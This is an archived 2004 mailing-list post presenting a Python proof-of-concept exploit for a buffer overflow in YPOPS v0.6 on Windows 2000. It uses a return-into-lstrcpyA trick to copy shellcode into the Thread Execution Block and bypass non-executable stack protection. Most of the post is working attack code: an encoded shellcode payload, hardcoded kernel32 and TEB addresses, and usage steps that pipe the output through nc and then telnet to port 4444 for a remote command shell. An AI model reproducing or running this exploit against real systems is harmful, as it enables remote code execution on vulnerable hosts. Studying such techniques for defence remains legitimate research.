Vulnerability Development mailing list archives
TEB buffer+Return Into LIBC based string copy exploitation
From: varun uppal <varunuppal () linuxmail org>
Date: 10 Nov 2004 11:38:14 -0000
Hi, I have put together some info on using the TEB (Thread Execution Block) Buffer and libc for exploiting NON-EXEC STACK Win32 environments. I havent come across any major public exploit using this method nor much of information on the same. The shell coders handbook was of great help though.Thought it would be useful for someone interested in the same. EXPLOIT: #!/usr/bin/env python """ Exploit for an old BoF in YPOPS v0.6 discovered by Behrang Fouldai Coded as a PoC for defeating NoN-Exec stacks and stack protections like overflow guard etc. This exploit utilizes the 520 byte buffer in the TEB (i.e is used for ANSI to Unicode String operations). The EIP is overwritten with the address of lstrcpyA accompanied by the return address, the source and destination buffer addresses. On successfull EIP overwrite the lstrcpyA copies the attacker supplied payload to the address in the TEB, following which the executions proceeds from there (since it is the return addr that we supplied). Came across this usefull concept in "The shell coders handbook". Can be used for 1) Bypassing stack protections. 2) When none of the regs (ecx,ebx, eax, esp etc) point to our payload. BUFFER LAYOUT |payload | addr of lstrcpyA | addr of buff in TEB | addr of buff in TEB | addr of our payload | ret addr for destination for Addr of our execution Payload Payload Tested on Win2K Adv Server with no patches and overflowguard. This is heavily dependent on the addresses which must be modified according to the versions. 0x77E87E39 --> Address of lstrcpyA from kernel32.dll 0x7ffDE1BC --> Address in TEB buffer to which payload will be copied and execution commences 0x00E6FAB8 --> Address of Payload on stack Shellcode from Sergio alvarez's paper on win32 exploitatiion (gr8 paper). Coded by Varun Uppal (varunuppal () linuxmail org) greetz to JhaanGi, swatkat_razor, saTurn444 and metasploit crew. gr8 work USAGE: python pop_exp2.py | nc "addr of target host" "target port" Telnet "addr of target host" 4444 for cmd prompt """ import struct exp = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66" exp += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6" exp += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa" exp += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f" exp += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb" exp += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba" exp += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb" exp += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc" exp += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61" exp += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70" exp += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44" exp += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7" exp += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69" exp += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9" exp += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0" exp += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3" exp += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7" exp += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0" exp += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67" exp += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1" exp += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0" exp += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88" exp += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d" exp += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95" exp += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2" print '\x90'*10+exp+'\x90'*96+ struct.pack('<L', 0x77e87e39)+struct.pack('<L', 0x7ffde1bc)+struct.pack('<L', 0x7ffde1bc)+'\xb8'+'\xfa'+'\xe6'+'\x00'
Current thread:
- TEB buffer+Return Into LIBC based string copy exploitation varun uppal (Nov 10)
- Re: TEB buffer+Return Into LIBC based string copy exploitation Paul Webster (Nov 12)
- Re[2]: TEB buffer+Return Into LIBC based string copy exploitation 3APA3A (Nov 14)
- Re: Re[2]: TEB buffer+Return Into LIBC based string copy exploitation Paul Webster (Nov 14)
- Re: Re[2]: TEB buffer+Return Into LIBC based string copy exploitation Berend-Jan Wever (Nov 15)
- Re[2]: TEB buffer+Return Into LIBC based string copy exploitation 3APA3A (Nov 14)
- Re: TEB buffer+Return Into LIBC based string copy exploitation Paul Webster (Nov 12)